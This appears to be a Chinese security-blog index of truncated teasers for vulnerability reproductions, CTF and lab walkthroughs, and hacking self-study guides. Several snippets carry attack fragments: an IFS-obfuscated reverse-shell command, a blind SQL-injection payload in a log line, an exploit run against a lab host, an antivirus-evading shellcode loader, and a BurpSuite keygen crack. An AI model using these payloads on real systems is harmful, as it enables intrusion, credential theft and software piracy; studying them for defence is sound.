1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

CVE-2020-36189 jackson-databind java反序列化漏洞

漏洞原理 jackson-databind是一套开源的java序列化与反序列化工具框架，可将java对象序列化为xml和json格式的字符串及提供对应的反序列化过程。由于其解析效率较高，目前是Spring MVC中内置使用的解析方式，该漏洞的触发条件是ObjectMapper反序…

笔试、面试总结（网络安全与渗透测试）

什么是同源策略？ 为了防止不同域在用户浏览器中彼此干扰，浏览器对从不同来源（域）收到的内容进行隔离。浏览器不允许任何旧有脚本访问一个站点的 cookie，否则 ，会话容易被劫持。只有发布 cookie 的站点能够…

Webmin（CVE-2019-15107）远程命令执行漏洞复现

漏洞编号 CVE-2019-15107 webmin介绍什么是webmin Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作http://www.webmin.com/Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。是一个基于Web的界面…

Webmin 远程命令执行漏洞_CVE-2019-15107

Webmin 远程命令执行漏洞_CVE-2019-15107 文章目录 Webmin 远程命令执行漏洞_CVE-2019-15107在线漏洞详情：漏洞描述：版本影响：环境搭建漏洞复现使用BP进行抓包POC发送以下POST请求来执行命令id:复现成功漏洞利用-shell反弹执行反弹指令bp的i…

网络安全（黑客技术）——如何高效自学

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学？如何学？ 今天给大家分享一下，很多人上来就说想学习黑客&#xff0c…

Notepad ++ 零基础入门到精通安装与配置教程（非常详细）

Notepad 获取与安装 —————————— Notepad 是什么在运行中输入 notepad 会弹出来记事本： 所以 Notepad 就是增强的记事本！这个跟 C 与 C 的名字是一样滴！ Notepad 是 Windows 操作系统下的一套文本编辑器软件版权许可证 GPL有…

网络安全（黑客）自学方向

每年报考网络安全专业的人数很多，但不少同学听说千万别学网络安全，害怕网络安全专业很难就业。下面就带大家深入了解一下网络安全专业毕业后可以干什么，包括网络安全专业的就业前景和方向等。随着信息化时代的到来，网络安全行业…

黑客（自学方法）技术——网络安全

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

{大厂漏洞 } OA产品存在SQL注入

0x01 漏洞介绍江苏叁拾叁-OA是由江苏叁拾叁信息技术有限公司开发的一款OA办公平台，主要有知识管理，工作流程，沟通交流，辅助办公，集成解决方案，应用支撑平台，基础支撑等功能。该系统也与江苏叁…

常见web信息泄露

一、源码(备份文件)泄露 1、git泄露 Git是一个开源的分布式版本控制系统，在执行git init初始化目录的时候，会在当前目录下自动创建一个.git目录，用来记录代码的变更记录等。发布代码的时候，如果没有把.git这个目录删除&#xff…

详解RSA加密算法 | Java模拟实现RSA算法

目录一.什么是RSA算法二.RSA算法的算法原理算法描述三.RSA算法安全性四.RSA算法的速度五.用java实现RSA算法一.什么是RSA算法 1976年，Diffie和Hellman在文章“密码学新方向（New Direction in Cryptography）”中首次提出了公开…

网络工程师知识点4

51、OSPF的LSA类型 52虚链路：作用解决区域划分不合理的问题通过建立虚拟链路来实现一般区域与骨干区域的理论化直连 54、NSSA区域的特点 1、可以学习本区域连接的外部路由 2、不学习其他区域转发进来的外部路由 3、与外部区域通信使用ABR自动产生的默认路…

网络安全 - 一名合格的Web安全工程师之成长路径

最近经常听到公司的招聘专员反馈应聘者简历“水分”太大，尤其是技术岗位，例如Web安全工程师，明明是初级阶段的菜鸟，就敢写资深Web安全工程师；在几个项目做一些基础打杂的工作，就敢写带过团队，项…

网络安全工程师需要学什么？零基础怎么从入门到精通，看这一篇就够了

网络安全工程师需要学什么？零基础怎么从入门到精通，看这一篇就够了我发现关于网络安全的学习路线网上有非常多看似高大上却无任何参考意义的回答。大多数的路线都是给了一个大概的框架，告诉你那些东西要考，以及建议了一个学习顺…

网络安全——自学（黑客技术）

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学？如何学？ 今天给大家分享一下，很多人上来就说想学习黑客&#xff0c…

SpringBootCms

SpringBootCMS，极速开发，动态添加字段，自定义标签，动态创建数据库表并crud数据，数据库备份、还原，动态添加站点(多站点功能)，一键生成模板代码，让您轻松打造自己的独立网站&#xff…

金蝶EAS、EAS Cloud远程代码执行漏洞

【漏洞概述】金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。【漏洞介绍】金蝶 EAS 及 EAS Cloud 存在远程代码执行漏洞【影响版本】金蝶 EAS 8.0，8.1，8.2&#xf…

evilhiding：一款好用的shellcode免杀工具

文章目录 evilhiding工具浅析项目地址用法免杀测试声明 evilhiding shellcode loader,bypassav,免杀工具，一款基于python的shellcode免杀加载器工具浅析远控条件触发防沙箱花指令干扰loader和shellcode进行fernet加密触发器混淆干扰特征码自动刷新ico图片的md5…

2023年中职组“网络安全”赛项云南省竞赛任务书

2023年中职组“网络安全”赛项云南省竞赛任务书一、竞赛时间总计：360分钟竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值 A模块 A-1 登录安全加固 180分钟 200分 A-2 本地安全策略配置 A-3 流量完整性保护 A-4 事件监控 A-5 服务加固…

windows内网渗透正向代理

内网渗透正向代理文章目录内网渗透正向代理1 正向代理图2 环境准备2.1 正向代理需求： 3 网卡配置3.1 【redream】主机3.2 【base】主机双网卡3.3 【yvkong】网卡设置 4 启动4.1【redream】网卡配置：4.2【base】网卡配置：4.3【yvkong】网卡地…

网站如何有效防止网络攻击

互联网上的网站和应用程序受到各种威胁，如黑客、恶意软件和数据泄漏。因此，了解如何解决网站被攻击的问题至关重要。本文将介绍一些简单的步骤，帮助您提高您的网站的安全性。确认攻击要解决网站被攻击的问题，首先需要识别是否遭…

APK与小程序渗透

文章目录 APK与小程序渗透1. APK2. 小程序2.1 源代码2.2 小程序的默认下载位置 3. 安装证书3.1 openssl配置环境变量3.2 安装证书 APK与小程序渗透由于APK和小程序与服务器通信还是采用的是https协议，只是使用了加密。只要获取到了HTTP的请求报文就可以回归到Web渗…

通达OA 2016网络智能办公系统 handle.php SQL注入漏洞

一、漏洞描述北京通达信科科技有限公司通达OA2016网络智能办公系统 handle.php 存在sql注入漏洞，攻击者可利用此漏洞获取数据库管理员权限，查询数据、获取系统信息，威胁企业单位数据安全。二、网络空间搜索引擎查询 fofa查询 app"T…

apk和小程序渗透

apk和小程序域服务器通信使用的还是http协议，只是使用了加密。只要可以获取到http的请求报文，就可以回归到web渗透的层面。apk和小程序的渗透很复杂，涉及逆向时要进行脱壳，脱壳后反编译了，源代码没做加密就能直接逆向出…

重磅！中科院1区TOP被踢？共7本被剔除！10月SCIE/SSCI期刊目录更新！

期刊动态：2023年10月SCI、SSCI期刊目录更新 2023年10月17日，科睿唯安更新了WOS期刊目录，继上次9月WOS期刊目录剔除7本SCIE&SSCI期刊之后，此次10月更新又有7本期刊发生变动，其中有5本SCIE期刊，1本SSCI期…

Codesys V3协议漏洞挖掘方法

背景概述 Codesys是全球最著名的软PLC内核软件研发厂家德国的3S（SMART，SOFTWARE，SOLUTIONS）公司发布的一款与制造商无关IEC 61131-1编程软件及工控设备内核（runtime SDK）。Codesys 支持完整版本的IEC61131…

Python武器库开发-基础篇(三)

基础篇(三) 函数下面是一个打印问候语的简单函数，名为greet_user() ： greeter.py def greet_user():"""显示简单的问候语"""print("Hello!")greet_user()这个示例演示了最简单的函数结构。第一行的代码行使…

Yakit工具篇：端口探测和指纹扫描的配置和使用

简介（来自官方文档） 端口扫描和指纹识别是渗透测试和网络安全领域中常用的基础技术之一，用于评估目标系统的安全性和发现可能存在的漏洞和攻击面。也是Yakit基础工具的模块之一。端口扫描是指通过扫描目标系统上的端口，确定哪…

【网络奇缘】- 计算机网络|性能指标|体系结构

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 目录温故而知新计算机网络性能指标时延时延带宽积往返时延RTT 访问百度编辑访问b站访问谷歌 …

全网最全最有用的网络安全（超详细）学习路线！整理了一个月！

正文： 禁止废话，先看学习路线图； 在这个圈子技术门类中，工作岗位主要有以下三个方向： 安全研发安全研究：二进制方向安全研究：网络渗透方向下面逐一说明一下。第一个方向：安全研发…

HTB Napper WriteUp

Napper 2023年11月12日 14:58:35User Nmap ➜ Napper nmap -sCV -A -p- 10.10.11.240 --min-rate 10000 Starting Nmap 7.80 ( https://nmap.org ) at 2023-11-12 13:58 CST Nmap scan report for app.napper.htb (10.10.11.240) Host is up (0.15s latency). Not shown: …

CVE-2022-0543（Redis 沙盒逃逸漏洞）

简介 CVE-2022-0543是一个与Redis相关的安全漏洞。在Redis中，用户连接后可以通过eval命令执行Lua脚本，但在沙箱环境中脚本无法执行命令或读取文件。然而，攻击者可以利用Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库liblua5.1.s…

掌握Net User命令：轻松创建、修改、删除和查看本地用户帐户

net user 命令用于管理本地用户帐户。它可以用于创建、修改、删除用户帐户，以及查看用户帐户的信息在Windows操作系统中，Net User命令是一个强大的工具，它允许管理员创建、修改、删除和查看本地用户帐户。无论你是IT专业人士还是普通用户&am…

服务器被暴力破解怎么解决

暴力破解分两种，一种是SSH暴力破解，属于Linux服务器。一种是RDP暴力破解，属于Windows服务器。两者其实攻击手法一样，都是黑客利用扫描工具对某一个IP段扫描，而Linux跟Windows登录端口为别是22和3389。那怎样才能有效避…

金某OA协同办公管理系统存在任意文件下载漏洞分析 CNVD-2021-43036

目录 1.漏洞概述 2.漏洞分析 3.Nuclei自动化扫描POC 4.修复方式 1.漏洞概述金和OA是由北京金某网络股份有限公司开发的一款办公自动化软件。旨在提高企业的工作效率和管理水平。它提供了一系列功能模块，涵盖了办公流程的各个方面，包括文档管理、协同办公、人力资源管理、…

web：[极客大挑战 2019]HardSQL

题目打开页面显示为查看源代码没有发现其他的提示信息，随便尝试一下错误题目名为hardsql，先来尝试有无sql注入存在尝试输入单引号输入显示页面存在注入这里按照常规思路继续使用order by函数和union select函数进行查询，但是页面没有…

绿某科技集团股份有限公司UTS统一威胁探针信息泄露漏洞复现 CNVD-2022-50360

目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.Nuclei自动化扫描POC 6.修复建议

网络安全（黑客）—自学笔记

目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、网络安全学习路线四、学习资料的推荐想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类…

bulldog 靶机

bulldog 信息搜集存活检测详细扫描后台网页扫描网页信息搜集正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一…

如何解决网站被攻击的问题

在当今数字化时代，网站攻击已经成为互联网上的一个常见问题。这些攻击可能会导致数据泄漏、服务中断和用户信息安全问题。然而，我们可以采取一些简单的措施来解决这些问题，以确保网站的安全性和可用性。使用强密码和多因素认证密码是保护网…

一文带你了解以色列的当红38家网络安全公司

2014年，以色列出口的网络安全产品总值达60亿美金，占领了全球10%的网络安全市场。2014-2016年，微软用3.2亿美元买下数据隐私公司Adallom；Facebook花了1.5亿美元收购移动端数据分析公司Onavo；PayPal以6千万美元收下CyAct…

waf、yakit和ssh免密登录

WAF安全狗脏数据适用于所有漏洞绕过waf，但是前提条件垃圾信息必须放在危险信息前，是不能打断原有数据包的结构，不能影响后端对数据包的解析。以DVWA靶场文件上传为例新建php文件上传文件被安全狗拦截使用bp抓包查看在数据包Content-…

Python武器库开发-基础篇(四)

基础篇(四) Open 文件 Python open() 方法用于打开一个文件，并返回文件对象。在对文件进行处理过程都需要使用到这个函数，如果该文件无法被打开，会抛出 OSError。注意：使用 open() 方法一定要保证关闭文件对象，即…

Django CSRF Bypass

自存用 Django CSRF Bypass (CVE-2016-7401) 漏洞分析

数据库安全-H2 databaseElasticsearchCouchDBInfluxdb漏洞复现

目录数据库安全-H2 database&Elasticsearch&CouchDB&Influxdb 复现influxdb-未授权访问-jwt 验证H2database-未授权访问-配置不当CouchDB-权限绕过配合 RCE-漏洞CouchDB 垂直权限绕过Couchdb 任意命令执行 RCE ElasticSearch-文件写入&RCE-漏洞Elasticsearch写…

在不懈进化的威胁面前：DDoS攻击防御的独特策略

DDoS（分布式拒绝服务）攻击，作为一种恶意行为，旨在将服务器或网络推向极限，使其陷入不堪重负的状态。这种威胁对于企业和组织来说一直是个巨大的挑战。本文探讨了一系列独特而创新的策略，以减轻DDoS攻击的影…

冰蝎默认加密的流量解密

破解冰蝎的默认加密流量包分析上传的冰蝎流量包 POST /web-zh/DVWA/vulnerabilities/upload/ HTTP/1.1 Host: 192.168.197.111 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: text/html,application/xhtmlxml,a…

EDU实战-SQL注入漏洞

对于edu来说，是新人挖洞较好的平台，本次记录一次走运的捡漏0x01 前景在进行fofa盲打站点的时候，来到了一个后台管理处看到集市二字，应该是edu站点确认目标身份（使用的quake进行然后去ipc备案查询） 网…

NewStarCTF 2023 公开赛道 WEEK2|MISC1-序章

题目 172.17.0.1 - - [20/Aug/2023:00:08:21 0800] "GET /app/action/edit_sell.php?pid%5B0%5D-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))40,sleep(1),1)--&totalPrice0 HTTP/1.1" 500 353 "-" &q…

sql注入危害成因分类注入点注入手法挖掘

危害 sql注入攻击者利用这个漏洞可以增删改查数据库数据或者利用潜在数据库攻击 1.对数据库增删改查或者直接对数据库脱库获取管理员账号密码 2.读写文件写webshell 写文件一句话木马需要的条件 root权限网站的绝对路径 sercure——file——priv的只…

DC-5 靶机

DC_5 信息搜集存活检测详细扫描后台网页扫描网页信息搜集发现 Contact 栏中有搜索框尝试上传内容多次上传后同一页面发现下方的年份数字在不断变化同时在查看源代码时发现年份所在的代码模块存在与之前扫描出的后台网站 footer.php 的名称相同猜测存在文件包含…

开源软件有漏洞，作者需要负责吗？是的！

近日，禅道创始人王春生在开源中国发布的一篇文章引起了众多同行的围观，原因是他分享了一个开源协议在中国面临的 bug：开源软件许可协议通常会表明作者不对用户使用该开源软件所造成的任何问题负责。但是！这种条款，在中…

网络安全（黑客）—零基础自学

目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、网络安全学习路线四、学习资料的推荐想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类&am…

喜报！CACTER邮件安全网关荣获2023鲲鹏应用创新大赛广东赛区三等奖

近期，2023鲲鹏应用创新大赛广东赛区暨广东省信息技术应用创新产业联盟创新大赛圆满落幕，Coremail凭借“基于鲲鹏CPU的邮件网关一体机解决方案”，荣获“金融行业方向”三等奖。鲲鹏凌粤展翅湾区本届大赛广东区域赛以“鲲鹏凌粤展翅湾…

内网渗透-域防火墙+入站出站规则+组策略对象同步+不出网隧道上线

一.单机-防火墙-限制端口出入站-熟悉常见主机配置不出网的方式配置防火墙属性 1.win10虚拟机本地搭建一个网站，配置防火墙属性的入站连接为默认值。局域网中另一台主机能正常访问 2.入站连接设置为阻止所有连接。因为是我们去访问他的网站，所以是入…

公司电脑屏幕录制软件有什么功能

电脑屏幕录制软件有很多，今天简单说说说它的基础功能和附属功能： 基础功能： 1、屏幕录像支持对所选电脑的屏幕进行录制，并且支持调整截屏频度、画面质量、单个视频时长等。 2、实时屏幕可以对对方电脑进行实时屏幕查看&…

网络安全—小白学习笔记

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟入…

libcurl Socks5 堆缓冲区溢出漏洞（CVE-2023-38545）详细分析

简介 curl 是用于在各种网络协议之间传输数据的命令行工具，libcurl 用于提供处理网络通信和数据传输的 Api 接口。curl 默认下载缓冲区为 102400 字节，但如果设置低于每秒 102400 字节，缓冲区大小会自动设置为更小的值。libcurl 下载缓冲区默…

RCE 远程代码执行漏洞分析

RCE 漏洞 1.漏洞描述 Remote Command/Code Execute 远程命令执行/远程代码执行漏洞这种漏洞通常出现在应用程序或操作系统中，攻击者可以通过利用漏洞注入恶意代码，并在受攻击的系统上执行任意命令。 2.漏洞场景 PHP 代码执行PHP 代码注入OS 命令执…

网络扫描与网络监听

前言：前文给大家介绍了网络安全相关方面的基础知识体系，以及什么是黑客，本篇文章笔者就给大家带来“黑客攻击五部曲”中的网络扫描和网络监听目录黑客攻击五部曲网络扫描按扫描策略分类按照扫描方式分类被动式策略系统用户扫描 …

记：2023羊城杯-Ez加密器-题目复现和学习记录““

文章目录前言题目分析and调试过程完整exp 前言前段时间的比赛，那会刚入门o(╥﹏╥)o都不会写，现在复现一下。羊城杯题目复现： 第二题知识点 ：动态调试 ： CSGO 第三题虚假控制流 py字典 MD5加密“”“” Blast …

记： CTF2023羊城杯 - Reverse 方向 Blast 题目复现and学习记录

文章目录前言题目分析and复习过程exp 前言羊城杯题目复现： 第一题知识点 ：DES算法 ： 链接：Ez加密器第二题知识点 ：动态调试 ： 链接：CSGO 这一题的查缺补漏： 虚假控制流的去除…

漏洞复现--用友U8-Cloud upload.jsp任意文件上传

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

ftp靶机_获取shell

ftp靶机_获取shell 文章目录 ftp靶机_获取shellftp概念实验环境信息探测发现漏洞优化shell ftp概念 FTP 是File Transfer Protocol(文件传输协议)的英文简称，而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时，它也是一个应用程序(…

对称加密和非对称加密以及CA证书

对称加密对称加密只用到了公匙，这个公匙是消息的发送方和消息的接收方共享的，也就是消息发送方使用这个公匙对消息加密，然后接收方使用公匙对消息解密，最典型的例子比如像 encrypt 加密，比如我们有个 springboot 应用，需要对 application.yml 文件里的密码做加密，我们…

【漏洞复现】DPTech VPN存在任意文件读取漏洞

漏洞描述 DPtech是在网络、安全及应用交付领域集研发、生产、销售于一体的高科技企业。DPtech VPN智能安全网关是迪普科技面向广域互联应用场景推出的专业安全网关产品，集成了IPSec、SSL、L2TP、GRE等多种VPN技术，支持国密算法，实现分支机构…

网络安全(黑客技术)—小白自学手册

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

延时盲注（CVE-2022-0948）

详解： 延时盲注，也称为时间盲注或延迟注入，是一种利用执行时间差判断是否执行成功的盲注手法。攻击者提交一个对执行时间敏感的SQL语句，通过执行时间的长短来判断注入是否成功。例如，如果注入成功，执行时间…

showdoc 文件上传（cnvd-2020-26585）

showdoc 文件上传 （cnvd-2020-26585） 描述 ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc，你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。 api_page存在任意文…

【漏洞复现】广联达 Linkworks办公OA SQL注入

广联达OA介绍广联达办公OA是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。资产收集 fofa：fid”/yV4r5PdARKT4jaqLjJYqw”或者body”/Servi…

亚马逊又出新规，多卖家又被封店

2023年，亚马逊平台的风浪似乎要比往年更频繁一些。自年初至今，不断推出了多项改动政策法规，从前台页面到后台功能，从算法规则到风控审核，不同类型的政策层出不穷，打的各位卖家措手不及。 3月份&#xff0c…

服务安全-应用协议rsync未授权ssh漏洞复现

目录服务攻防-应用协议rsync&ssh漏洞复现漏洞复现配置不当-未授权访问-rsync文件备份OpenSSH 用户名枚举漏洞libssh身份验证绕过漏洞服务攻防-应用协议rsync&ssh漏洞复现漏洞复现配置不当-未授权访问-rsync文件备份 rsync默认端口：873 rsync是Linux下…

黑客技术（自学方法）——网络安全技术

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学？如何学？ 今天给大家分享一下，很多人上来就说想学习黑客&#xff0c…

攻防千层饼

近年来，网络安全领域正在经历一场不断升级的攻防对抗，这场攻防已经不再局限于传统的攻击与防御模式，攻击者和防守者都已经越发熟练，对于传统攻防手法了如指掌。在这个背景下，攻击者必须不断寻求创新的途径&#xff0…

[极客大挑战 2019]BuyFlag 1（两种解法）

题目环境： FLAG NEED YOUR 100000000 MONEY flag需要你的100000000元 F12瞅瞅源代码： if (isset($_POST[password])){ $password $_POST[password]; if (is_numeric($password)) { echo "password cant be number" } elseif ($pas…

c++踩坑点，类型转换

std::string转换到PVOID std::string转换到PVOID的方式如下这样的话成功转换 “const char *” 类型的实参与 “WCHAR *” “const char *” 类型的实参与 “WCHAR *” 类型的形参不兼容可以看到这种报错，可以直接强转如下： 但是在我们这里不适…

(2)Nmap

笔记目录渗透测试工具(1)wireshark 渗透测试工具(2)Nmap渗透测试工具(3)Burpsuite 1.工具简介 (1)定义 ①功能网络扫描和嗅探工具包，三个主要基本功能： 探测一组主机是否在线扫描主机端口、嗅探所提供的网络服务推断出主机所用的操作系统 ②namp …

沙箱对抗之反沙箱技巧

前言我们经常会在红蓝对抗中遇到这种场景，离线免杀，但是10分钟又被杀，这就是云查杀的威力，而云查杀可以分为下列两种: 1.静态分析 2.动态分析静态分析就是分析样本的结构，导入表，等等来判定是否是恶意程…

某讯D-Link AC集中管理平台未授权访问漏洞复现 CNVD-2023-19479

目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.Nuclei自动化验证POC 6.修复建议

代码签名证书续费

代码签名证书的有效周期是1-3年，这种情况下证书到期了就要重新申请办理，最开始同样的申请验证步骤还要再走一遍，尤其是Ukey还是要CA机构重新颁发，还是要等待快递配送。OV代码签名证书、EV代码签名证书目前行业内统一采取Ukey存储&…

【技能树笔记】网络篇——练习题解析（十）

【技能树笔记】网络篇系列前九篇【技能树笔记】网络篇——练习题解析（一）-CSDN博客【技能树笔记】网络篇——练习题解析（二）-CSDN博客【技能树笔记】网络篇——练习题解析（三）-CSDN博客【技能树笔记】网…

1.7 攻击面和攻击树

思维导图： 1.7 攻击面与攻击树攻击面: 描述计算机和网络系统面对的安全威胁和攻击。定义: 攻击面是由系统中可访问和可利用的漏洞所组成。常见攻击面: 向外部Web及其他服务器开放的端口和相应代码。防火墙内部的服务。处理入站数据、电子邮件、XML文件、Office文档…

免费好用的DNS在线工具，DNS记录、域名被墙、Whois轻松查询

在互联网的世界中，DNS是一种非常重要的存在，它们是域名与IP地址之间的桥梁，用于实现用户访问网站。我们在搭建网站时，经常会用到一些DNS工具，以便了解网站的DSN情况。DNS记录查询工具、域名被墙检测工具以及Whois域名信…

服务器经常被攻击的原因

很多中小型企业都是选择虚拟主机服务器，是把一个服务器分成很多个给很多企业一起共用，可能同一个 IP服务器上就有很多个不同企业的网站，这个时候如果跟你同一个IP服务器的网站遭到DDoS攻击，就很有可能会影响到你的网站也无法正常访…

tiki靶机攻略

tiki靶机攻略扫描渗透访问robots.txt 发现目录，访问一下再次扫描/tiki/目录，然后发现changelog下又tiki的版本信息 kali漏洞搜索，找到一个符合版本的 python3 48927.py 10.4.7.159执行过后，显示不需要密码即可登录随后bp登…

FSB逮捕为乌克兰网络部队工作的俄罗斯黑客

导语近日，俄罗斯联邦安全局（FSB）逮捕了两名涉嫌协助乌克兰网络部队对俄罗斯重要基础设施目标进行网络攻击的个人。这起事件引起了广泛关注，涉及到了网络安全和国际关系等多个领域。本文将为您详细介绍这一事件的背景和最新进展。…

thinkphp漏洞复现

thinkphp漏洞复现 ThinkPHP 2.x 任意代码执行漏洞Thinkphp5 5.0.22/5.1.29 远程代码执行ThinkPHP5 5.0.23 远程代码执行ThinkPHP5 SQL Injection Vulnerability && Sensitive Information Disclosure VulnerabilityThinkPHP Lang Local File Inclusion ThinkPHP 2.x 任…

【漏洞复现】金蝶云星空管理中心

目录 0x01 漏洞介绍 0x02 影响产品 0x03 语法特征 0x04 漏洞复现 0x01 漏洞介绍金蝶云星空是一款基于领先的可组装低代码PaaS平台，全面服务客户研发、生产、营销、供应链、财务等领域转型的企业管理服务平台。它已支持IPD、精益、阿米巴等先进管理理念在3.1万余…

告知粉丝重要

告知! 亲爱的粉丝朋友们，由于CSDN(博客)平台的限制，被迫转入公众号!希望粉丝朋友们谅解!我们也是被逼无奈~~ 但我们还是会在CSDN(博客)发文章，但很少。如果想要接触更好的文章请关注我们公众号，谢谢! 微信公众号:

网络安全（黑客）-0基础小白自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

XCTF-Crypto1

Caesar 题目描述 oknqdbqmoq{kag_tmhq_xqmdzqp_omqemd_qzodkbfuaz} 分析解密根据题目Caesar推测是凯撒加密当偏移量为12时，成功得到flag：cyberpeace{you_have_learned_caesar_encryption} Morse 题目描述 11 111 010 000 0 1010 111 100 0 00 000 …

关于网站安全的一些讨论

互联网的普及和发展为企业和个人提供了巨大的机会，但同时也伴随着网络安全威胁的增加。网站被攻击是一个常见的问题，可能导致数据泄露、服务中断和声誉受损。在本文中，我们将探讨与网络安全紧密相关的因素，分析为什么网站容易受到…

黑客（网络安全）技术——高效自学

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

使命担当守护安全 | 中睿天下获全国海关信息中心感谢信

近日，全国海关信息中心向中睿天下发来感谢信，对中睿天下在2023年网络攻防演练专项活动中的大力支持和优异表现给予了高度赞扬。中睿天下对此次任务高度重视，紧密围绕全国海关信息中心的行动要求，发挥自身优势有效整合资源&#x…

网络安全/黑客技术（0基础入门到进阶提升）

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

内存马概念

内存马概念文章目录内存马概念木马演变内存使用条件内存缺点JAVA Web三大组件Listener:监听器servelet请求流程内存马分类内存演示内存马植入方式案例shiro反序列化漏洞植入内存马木马演变内存使用条件 1. 禁止外联 2. 文件监控、查杀 3. spring Boot，不支持js…

BUUCTF 刮开有奖 1

这题使用IDA反汇编的话有windows编程基础会好些，看不懂跟着思路来也行文章目录一、基本分析二、代码分析第一处判断疑问第二个判断第三处判断第四处判断第五处判断第五处判断三、flag四、最后一、基本分析运行后然后就什么都没有了 IDA反汇编紫色颜色的函…

框架安全-CVE 复现SpringStrutsLaravelThinkPHP漏洞复现

目录服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP概述PHP-开发框架安全-Thinkphp&Laravel漏洞复现Thinkphp-3.X RCEThinkphp-5.X RCELaravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2Struts2框架安全…

可以实时监控屏幕的电脑监控软件

电脑已经成为了人们工作和生活不可或缺的工具。然而，这也带来了诸多安全问题。一些人可能会利用电脑进行不恰当的操作，如聊天、游戏、观看视频等，甚至会泄露公司的商业机密。电脑监控软件的定义电脑监控软件是一种用于监控电脑使用情况的软…

黑客技术（网络安全）—小白自学

目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、网络安全学习路线四、学习资料的推荐想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！ 网络安全可以基于攻击和防御视角来分类&am…

代码签名证书如何申请

代码签名证书也称之为软件数字证书，也可以叫作微软信任证书，主要给软件进行身份确定及保护知识产权，也可以被操作系统给信，对于软件开发企业是一项最基本的产品之一。代码签名证书分为OV和EV两种类型，虽然认证步骤大同…

chill_hack靶机攻略

chill_hack靶机攻略扫描渗透 ftp开放，提示ftp连接连接过后发现一个文本文件下载下来 ftp 10.4.7.155 ftp ftp dir get note.txt查看内容此处可以知道两个用户名，并且提示命令被过滤 bash${IFS}-c${IFS}bash${IFS}-i${IFS}>&${IFS}/dev…

黑客技术（网络安全）——如何高效学习

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学今天给大家分享一下，很多人上来就说想学习黑客，但是连方向都没搞清楚就开始学习…

BurpSuite 破解

下载 BurpSuite 下载 Java17 下载后确定版本 java -version获取启动器密钥生成器破解将下载的 BurpSuite、启动器、密钥生成器，放入同一个目录打开 CMD 进入该目录启动密钥生成器 java -jar burp-keygen-scz.jar开启新的CMD，进入该目录启动…

Vcenter实战利用方式总结

目录 0x01 指纹特征 0x02 查看Vcenter版本 0x03 CVE-2021-21972 0x04 CVE-2021-22005 0x05 CVE-2021-44228 0x06 获取vcenter-web控制台权限重置密码 cookie登录不重置获取密码（ESXI） 1、获取解密key 2、获取数据库账号密码 3、使用脚本解…

dc9靶机攻略

